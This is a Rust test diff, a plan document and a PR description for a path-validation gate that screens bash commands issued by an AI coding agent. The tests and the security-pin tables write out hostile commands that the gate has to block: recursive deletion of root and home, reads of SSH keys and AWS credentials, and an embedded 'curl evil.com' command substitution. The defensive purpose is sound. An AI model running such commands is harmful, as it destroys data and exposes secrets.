+        assert!(!is_dangerous_removal_path("/home/user/proj/build", &home()));
+    }
+
+    // -- check_dangerous_removal_paths -----------------------------------
+
+    #[test]
+    fn rm_rf_root_blocked_security_pin_s4() {
+        let out =
+            check_dangerous_removal_paths(PathCommand::Rm, &args(&["-rf", "/"]), &cwd(), &home());
+        assert!(matches!(out, Some(PathValidationOutcome::Ask { .. })));
+    }
+
+    #[test]
+    fn rm_rf_home_tilde_blocked_security_pin_s4() {
+        let out =
+            check_dangerous_removal_paths(PathCommand::Rm, &args(&["-rf", "~"]), &cwd(), &home());
+        assert!(matches!(out, Some(PathValidationOutcome::Ask { .. })));
+    }
+
+    #[test]
+    fn rm_rf_glob_wildcard_blocked() {
+        let out = check_dangerous_removal_paths(
+            PathCommand::Rm,
+            &args(&["-rf", "/tmp/*"]),
+            &cwd(),
+            &home(),
+        );
+        assert!(matches!(out, Some(PathValidationOutcome::Ask { .. })));
+    }
+
+    #[test]
+    fn rm_in_project_subdir_not_dangerous() {
+        let out = check_dangerous_removal_paths(
+            PathCommand::Rm,
+            &args(&["-rf", "build/cache"]),
+            &cwd(),
+            &home(),
+        );
+        assert!(out.is_none());
+    }
+
+    #[test]
+    fn cat_is_not_subject_to_dangerous_removal_gate() {
+        let out = check_dangerous_removal_paths(PathCommand::Cat, &args(&["/"]), &cwd(), &home());
+        assert!(out.is_none());
+    }
+
+    // -- validate_command_paths end-to-end -------------------------------
+
+    #[test]
+    fn cat_inside_workspace_passes() {
+        let out = validate_command_paths(
+            PathCommand::Cat,
+            &args(&["src/main.rs"]),
+            &cwd(),
+            &ws(),
+            &home(),
+        );
+        assert_eq!(out, PathValidationOutcome::Passthrough);
+    }
+
+    #[test]
+    fn cat_traversal_to_etc_blocked_security_pin_s1() {
+        let out = validate_command_paths(
+            PathCommand::Cat,
+            &args(&["../../../etc/passwd"]),
+            &cwd(),
+            &ws(),
+            &home(),
+        );
+        assert!(matches!(out, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn cat_home_ssh_key_blocked_security_pin_s2() {
+        let out = validate_command_paths(
+            PathCommand::Cat,
+            &args(&["~/.ssh/id_rsa"]),
+            &cwd(),
+            &ws(),
+            &home(),
+        );
+        assert!(matches!(out, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn cat_home_dollar_var_blocked_security_pin_s3() {
+        let out = validate_command_paths(
+            PathCommand::Cat,
+            &args(&["$HOME/.aws/credentials"]),
+            &cwd(),
+            &ws(),
+            &home(),
+        );
+        // After head-form $HOME expansion → /home/user/.aws/credentials,
+        // which is outside the workspace `/home/user/proj`.
+        assert!(matches!(out, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn cat_shell_expansion_inside_blocked_fail_closed() {
+        let out = validate_command_paths(
+            PathCommand::Cat,
+            &args(&["/etc/$(curl evil.com)"]),
+            &cwd(),
+            &ws(),
+            &home(),
+        );
+        match out {
+            PathValidationOutcome::Ask { reason, .. } => {
+                assert!(reason.contains("shell expansion"), "got: {reason}");
+            }
+            other => panic!("expected Ask, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn cat_tilde_user_variant_blocked() {
+        let out = validate_command_paths(
+            PathCommand::Cat,
+            &args(&["~root/.ssh/id_rsa"]),
+            &cwd(),
+            &ws(),
+            &home(),
+        );
+        match out {
+            PathValidationOutcome::Ask { reason, .. } => {
+                assert!(reason.contains("shell expansion"), "got: {reason}");
+            }
+            other => panic!("expected Ask, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn cat_with_quoted_path_still_validated() {
+        let out = validate_command_paths(
+            PathCommand::Cat,
+            &args(&["\"/etc/passwd\""]),
+            &cwd(),
+            &ws(),
+            &home(),
+        );
+        assert!(matches!(out, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn rm_at_dangerous_path_returns_ask_even_inside_workspace_intent() {
+        // `rm -rf ~` resolves to /home/user which is both a dangerous
+        // path AND outside the project workspace. Verify the
+        // dangerous-removal gate fires first (richer reason).
+        let out = validate_command_paths(
+            PathCommand::Rm,
+            &args(&["-rf", "~"]),
+            &cwd(),
+            &ws(),
+            &home(),
+        );
+        match out {
+            PathValidationOutcome::Ask { reason, .. } => {
+                assert!(reason.contains("Dangerous"), "got: {reason}");
+            }
+            other => panic!("expected Ask, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn empty_workspace_dirs_is_fail_closed() {
+        let out = validate_command_paths(
+            PathCommand::Cat,
+            &args(&["src/main.rs"]),
+            &cwd(),
+            &[],
+            &home(),
+        );
+        assert!(matches!(out, PathValidationOutcome::Ask { .. }));
+    }
+
+    #[test]
+    fn ls_default_cwd_passes_when_cwd_in_workspace() {
+        let out = validate_command_paths(PathCommand::Ls, &args(&["-la"]), &cwd(), &ws(), &home());
+        assert_eq!(out, PathValidationOutcome::Passthrough);
+    }
+
+    // -- normalize_path / resolve_logical sanity ------------------------
+
+    #[test]
+    fn normalize_collapses_dot_and_parent() {
+        let out = normalize_path(Path::new("/a/./b/../c"));
+        assert_eq!(out, PathBuf::from("/a/c"));
+    }
+
+    #[test]
+    fn resolve_logical_relative_against_cwd() {
+        let out = resolve_logical("src/main.rs", &PathBuf::from("/home/user/proj"));
+        assert_eq!(out, "/home/user/proj/src/main.rs");
+    }
+
+    #[test]
+    fn resolve_logical_traversal_escapes_cwd() {
+        let out = resolve_logical("../../../etc/passwd", &PathBuf::from("/home/user/proj"));
+        assert_eq!(out, "/etc/passwd");
+    }
+}

--- a/docs/plans/bash-parity/phase-3.1-path-validation-deepening.md
+++ b/docs/plans/bash-parity/phase-3.1-path-validation-deepening.md
@@ -4,7 +4,7 @@
 **Epic**: #490
 **Phase 2 完成度**: 2.1 + 2.2 全部 MERGED (PR #522/#524/#549/#551/#553/#557/#560)
 **预计工作量**: ~800 LOC + ~150 LOC AST/filesystem 前置
-**Slices**: 3.1.a → 3.1.f（6 个独立可合并 PR）
+**Slices**: 3.1.0 ✅ + 3.1.A / 3.1.B / 3.1.C（合并后 4 切片，详见 §3）
 
 ## 1. 当前差距
 
@@ -39,42 +39,41 @@ checkPathConstraints (主入口, L1013)
 - ✅ `strip_safe_wrappers`: `dasclaw_bash_permissions::strip_env` (Phase 2.2.e)
 - ✅ `SAFE_ENV_VARS`: 同上
 
-**尚需前置（小切片，可与 3.1.a 并发）**：
+**尚需前置（已并入 3.1.0 / 3.1.A）**：
 - ⚠️ `extract_output_redirections` (上游 `utils/bash/commands.ts`) — Slice **3.1.0** ~80 LOC
-- ⚠️ Tilde / `$HOME` 展开（不引入完整 shell expansion，仅 `~` 前缀 + `$HOME` 字面替换）— 嵌入 3.1.b
+- ⚠️ Tilde / `$HOME` 展开（不引入完整 shell expansion，仅 `~` 前缀 + `$HOME` 字面替换）— 嵌入 3.1.A
 
 **不 port（红线）**：
 - ❌ `utils/permissions/filesystem.ts` 整个 1777 LOC（含 git submodule 协议、SymlinkPolicy、`getRealPath` IO 等）— 仅取 `allWorkingDirectories` 等价概念（一个 `Vec<PathBuf>`），不强行包装。
 - ❌ ANT-only / telemetry / growthbook 分支。
 
-## 3. Slice 拆分
+## 3. Slice 拆分（合并后 4 切片，2026-XX 调整）
+
+> **历史**：原始拆分为 7 切片（3.1.0/a/b/c/d/e/f）。a→d 是同一功能链（数据表→边界→重定向→整合），分 4 PR 引入"中间态不可用"，stacked drag 加重 review。已合并为 4 切片。
 
 | Slice | 范围 | 预估 LOC | 依赖 | 备注 |
 |-------|------|---------|------|------|
-| **3.1.0** | `extract_output_redirections` AST helper（独立子模块或扩展 `dasclaw_shell_command::bash`） | ~80 | tree-sitter-bash | 前置，纯函数 |
-| **3.1.a** | `PathCommand` enum + `PATH_EXTRACTORS` 表 + `COMMAND_OPERATION_TYPE` 表 + 40 类命令对照 | ~250 | 无 | 纯数据结构 + 17 类单元测试 |
-| **3.1.b** | `expand_tilde_and_home` + `validate_command_paths` 工作区边界核 + 危险删除路径检测 | ~150 | 3.1.a | SECURITY PIN: `rm -rf /` 系列 |
-| **3.1.c** | `validate_output_redirections` | ~100 | 3.1.0 + 3.1.b | SECURITY PIN: `cmd > /etc/passwd`, `< /root/.ssh/id_rsa` |
-| **3.1.d** | `check_path_constraints` 主入口 + AST argv 拆分 + Fail-Closed misparse path | ~180 | 3.1.a + 3.1.b + 3.1.c | 整合层 |
-| **3.1.e** | Hook 接线: 在 `BashPermissionHook` 之后或之前插入 path gate；新增 `DecisionReason::PathOutOfWorkspace` 等 reason | ~80 | 3.1.d | 决定 gate 顺序（建议 path 在 security 之后、permissions 之前） |
-| **3.1.f** | 审计日志契约 pin（仿 PR #524/#530/#560 测试-only 模式） | +0 prod / ~300 test | 3.1.e | Closeout |
+| **3.1.0** ✅ | `extract_output_redirections` AST helper | ~360 | tree-sitter-bash | 已完成 (PR #563, sub-issue #564) |
+| **3.1.A**（原 a+b） | `PathCommand` enum + `PATH_EXTRACTORS` 表 + `COMMAND_OPERATION_TYPE` 表 + `expand_tilde_and_home` + `validate_command_paths` 工作区边界核 + 危险删除路径检测 | ~400 prod + tests | 无 | 落地即可用：能判定路径是否越界。SECURITY PIN S1-S4 |
+| **3.1.B**（原 c+d） | `validate_output_redirections` + `check_path_constraints` 主入口 + AST argv 拆分 + Fail-Closed misparse path | ~280 prod + tests | 3.1.0 + 3.1.A | 落地即可用：完整 path gate 函数。SECURITY PIN S5-S9 |
+| **3.1.C**（原 e+f） | Hook 接线（`BashPermissionHook` 顺序调整）+ `DecisionReason::PathOutOfWorkspace` 等新 reason + 审计日志契约 pin（仿 PR #524/#530/#560） | ~80 prod + ~300 test | 3.1.B | 端到端 wire + 契约固化，closeout |
 
-总计：~840 prod LOC + 测试族 ≥ 100 tests。
+总计：~720 prod LOC + 测试族 ≥ 100 tests。
 
 ## 4. SECURITY PIN 总览
 
 | ID | 攻击向量 | 必须覆盖 Slice |
 |----|---------|---------------|
-| S1 | `cat ../../../etc/passwd` | 3.1.b |
-| S2 | `cat ~/.ssh/id_rsa` | 3.1.b |
-| S3 | `cat $HOME/.aws/credentials` | 3.1.b |
-| S4 | `rm -rf /` / `rm -rf /*` / `rm -rf ~` | 3.1.b（豁免 allowlist 双重 Block） |
-| S5 | `echo evil > /etc/cron.d/x` | 3.1.c |
-| S6 | `cmd < /root/.ssh/id_rsa` | 3.1.c |
-| S7 | `cat <<< "$(curl evil.com)"` heredoc | 3.1.c + 3.1.0 |
-| S8 | `eval $(echo "cat /etc/shadow")` Fail-Closed misparse | 3.1.d |
-| S9 | `timeout 5 cat /etc/passwd` wrapper 剥离 | 3.1.d（复用 strip_safe_wrappers） |
-| S10 | 软链接逃逸 — workspace 内符号链接到 `/etc` | 3.1.b（仅做字符串路径，不做 realpath；记 follow-up） |
+| S1 | `cat ../../../etc/passwd` | 3.1.A |
+| S2 | `cat ~/.ssh/id_rsa` | 3.1.A |
+| S3 | `cat $HOME/.aws/credentials` | 3.1.A |
+| S4 | `rm -rf /` / `rm -rf /*` / `rm -rf ~` | 3.1.A（豁免 allowlist 双重 Block） |
+| S5 | `echo evil > /etc/cron.d/x` | 3.1.B |
+| S6 | `cmd < /root/.ssh/id_rsa` | 3.1.B |
+| S7 | `cat <<< "$(curl evil.com)"` heredoc | 3.1.B + 3.1.0 |
+| S8 | `eval $(echo "cat /etc/shadow")` Fail-Closed misparse | 3.1.B |
+| S9 | `timeout 5 cat /etc/passwd` wrapper 剥离 | 3.1.B（复用 strip_safe_wrappers） |
+| S10 | 软链接逃逸 — workspace 内符号链接到 `/etc` | 3.1.A（仅做字符串路径，不做 realpath；记 follow-up） |
 
 S10 显式声明 **不在本阶段范围**（避免引入 1777 LOC `filesystem.ts` 的 SymlinkPolicy）—— 软链接逃逸列入 Phase 3.1.g 后续。
 
@@ -93,11 +92,10 @@ S10 显式声明 **不在本阶段范围**（避免引入 1777 LOC `filesystem.t
 
 ## 7. 拆分理由（避免补丁式代码）
 
-- **3.1.a 独立**：40 类命令的 PATH_EXTRACTORS 是纯数据结构，单独 PR review 友好，无逻辑变动
-- **3.1.0 前置**：AST helper 与 `dasclaw_shell_command` 同 crate，单独 PR 让 review focus 在 tree-sitter 用法上
-- **3.1.b / 3.1.c 并列**：两类 path gate（命令参数 vs 重定向）正交，可并发开 PR
-- **3.1.d 整合**：必须在 3.1.a-c merge 之后开
-- **3.1.e 接线 + 3.1.f 审计 pin**：与 Phase 2.2.f/.h 同结构，便于复用经验
+- **3.1.0 前置**：AST helper 是纯函数，无依赖，先 land 让后续切片复用
+- **3.1.A 内聚**：数据表 + 工作区边界判定一起落地，避免"光看数据表不知道怎么用"的中间态；review 单元更完整
+- **3.1.B 整合**：重定向校验 + 主入口 + Fail-Closed 一次性接齐，依赖 3.1.A 已稳定的 `validate_command_paths`
+- **3.1.C 接线 + 契约 pin**：与 Phase 2.2.f/.h 同结构，hook 顺序调整 + 审计日志契约一起 closeout
 
 ## 8. 后续相关 Phase
 


### PR DESCRIPTION
## 背景 / 目标

Phase 3.1（路径校验深化）按 7→4 合并方案的 **3.1.A 切片**，对齐上游
`claude-code-main/src/tools/BashTool/pathValidation.ts` 的数据表与工作区边界判定核心。
上一切片 #563 (3.1.0) 完成了输出重定向的 AST 抽取；本切片在同一 crate (`dasclaw_bash_validation`) 内补齐**路径命令枚举 + 路径抽取器 + 危险删除护栏 + 工作区边界判定**。

## 改动范围

**新增** `crates/dasclaw_bash_validation/src/path_validation.rs`（~700 LOC + 52 测试）：

| 项目 | 上游对应 | 说明 |
|---|---|---|
| `PathCommand` (36 variants) | `PathCommand` union | 一一对应 |
| `FileOperationType` (Read/Write/Create) | `FileOperationType` | + `PathCommand::operation_type` 对齐 `COMMAND_OPERATION_TYPE` |
| `PathValidationOutcome` | `ValidationResult` | Passthrough / Block / Ask，3.1.C 的 DecisionReason 可直消费 |
| `extract_paths` | `PATH_EXTRACTORS` | `cd / ls / find / grep / rg / sed / jq / git diff --no-index / tr` special-case，其余走 `filter_out_flags` |
| `filter_out_flags` | `filterOutFlags` | POSIX `--` 末端选项分隔符 |
| `expand_tilde_and_home` | `expandTilde` 子集 | 仅 `~`、`~/`、`$HOME`、`$HOME/...` 头部形式 |
| `has_unsafe_expansion` | `validatePath` 拒绝集 | `$` / `%` / 前导 `=` / `~user` / `~+` / `~-` / `~N` |
| `is_dangerous_removal_path` + `check_dangerous_removal_paths` | 同名 | 仅 `rm`/`rmdir`，覆盖根目录 / 根直接子项 / `$HOME` / 通配符 |
| `validate_command_paths` | `checkPathConstraints` 核心 | 工作区边界判定 + dangerous-removal 短路 |

**接线** `crates/dasclaw_bash_validation/src/lib.rs`：`pub mod path_validation` + re-export 全部公开 API。

**计划文档** `docs/plans/bash-parity/phase-3.1-path-validation-deepening.md`：按 7→4 合并方案重写 §3 切片表、§4 SECURITY PIN 映射、§7 拆分理由（25/-27 行）。

## 非目标（What's NOT in this PR）

- ❌ **输出重定向校验** — 留给 3.1.B（复用 #563 的 `redirects.rs`）
- ❌ **AST argv 切分 / `stripSafeWrappers` 集成** — 3.1.B
- ❌ **Hook 接线 + 审计日志契约钉** — 3.1.C
- ❌ **Symlink 逃逸检测** — Phase 3.1 follow-up（§6 OQ）
- ❌ **替换既有 `validate_paths` 启发式** — 本切片是**并行入口**，旧路径不动；3.1.C 完成接线后再统一

## 安全契约（Fail-Closed）

| PIN | 攻击向量 | 测试 | 结果 |
|---|---|---|---|
| S1 | `cat ../../../etc/passwd` | `cat_traversal_to_etc_blocked_security_pin_s1` | Ask |
| S2 | `cat ~/.ssh/id_rsa` | `cat_home_ssh_key_blocked_security_pin_s2` | Ask |
| S3 | `cat $HOME/.aws/credentials` | `cat_home_dollar_var_blocked_security_pin_s3` | Ask |
| S4 | `rm -rf /` / `rm -rf ~` / `rm -rf /tmp/*` | `rm_rf_*_blocked_security_pin_s4` | Ask（dangerous-removal 优先于边界检查） |
| — | `cat /etc/$(curl evil)` shell 展开 | `cat_shell_expansion_inside_blocked_fail_closed` | Ask |
| — | `~root/.ssh/id_rsa` 用户变体 | `cat_tilde_user_variant_blocked` | Ask |
| — | 空 `workspace_dirs` | `empty_workspace_dirs_is_fail_closed` | Ask |
| — | `rm -- -/../.claude/x` POSIX `--` 攻击 | `extract_rm_honors_double_dash_security_pin` | 不被丢弃 |

## 验证

```bash
cargo check -p dasclaw_bash_validation --tests        # clean
cargo nextest run -p dasclaw_bash_validation          # 255/255 passed
cargo fmt --all                                       # ok
python3.12 scripts/check_no_panics.py --base origin/xClaw  # OK
cargo clippy --no-deps -p dasclaw_bash_validation --all-targets -- -D warnings  # clean
```

## Sources read

- `AGENTS.md` §强制阅读顺序 / Skills 规范 / 会话轮换 / 反补丁式
- `docs/plans/bash-parity/phase-3.1-path-validation-deepening.md` §1–§7（本 PR 同时改写 §3/§4/§7）
- `claude-code-main/src/tools/BashTool/pathValidation.ts` L1-880（PathCommand union / PATH_EXTRACTORS / filterOutFlags / parsePatternCommand / find / sed / tr / git / COMMAND_OPERATION_TYPE / validateCommandPaths / createPathChecker / parseCommandArguments / validateSinglePathCommand）
- `claude-code-main/src/utils/permissions/pathValidation.ts` L78-450（expandTilde / isDangerousRemovalPath / validatePath TOCTOU 拒绝集）
- `crates/dasclaw_bash_validation/Cargo.toml`（依赖确认：tree-sitter / regex / once_cell 已就绪，无需新增）
- `crates/dasclaw_bash_validation/src/lib.rs` / `redirects.rs`（既有模块布局，path_validation.rs 镜像 redirects.rs 的单文件模式）
- ADR-129 §1.3 + ADR-133（`dasclaw_shell_command` verbatim-lock — 新数据表必须落在 `dasclaw_bash_validation`）

## 3 层代码审查（自查）

| 层 | 检查项 | 结果 |
|---|---|---|
| L1 静态 | `cargo check` / `fmt` / `clippy -D warnings` | ✅ 全通 |
| L1 静态 | `scripts/check_no_panics.py` | ✅ 无 unwrap/expect/panic |
| L1 静态 | 函数 ≤50 LOC / 嵌套 ≤3 | ✅ 最长 `sed_extractor` ≈35 LOC，嵌套 3 |
| L2 单测 | S1-S4 PIN 全覆盖、Fail-Closed 显式断言 | ✅ 52 新测试 + 既有 203 |
| L2 单测 | round-trip `parse ↔ as_str` 覆盖 36 命令 | ✅ `parse_recognizes_all_36_commands` |
| L3 集成 | crate 级 nextest | ✅ 255/255 |
| L3 集成 | 与既有 `validate_paths` / `redirects` 无符号冲突 | ✅ 并行入口，旧路径不动 |
| 反补丁 | 新功能独立模块，未在既有函数尾追加 `if` 分支 / 复制粘贴 / flag 切换大块代码 | ✅ |
| 红线 | 未触碰 `dasclaw_shell_command` 的 verbatim-lock | ✅ |

## 关联

- **Closes #566** (slice 3.1.A sub-issue)
- Refs #562 (Phase 3.1 tracker)
- Refs #490 (Epic)
- 前置: #563 (3.1.0 — 已合并)
- 后续: 3.1.B（重定向校验主入口 + AST argv 切分）→ 3.1.C（hook 接线 + 审计契约钉）
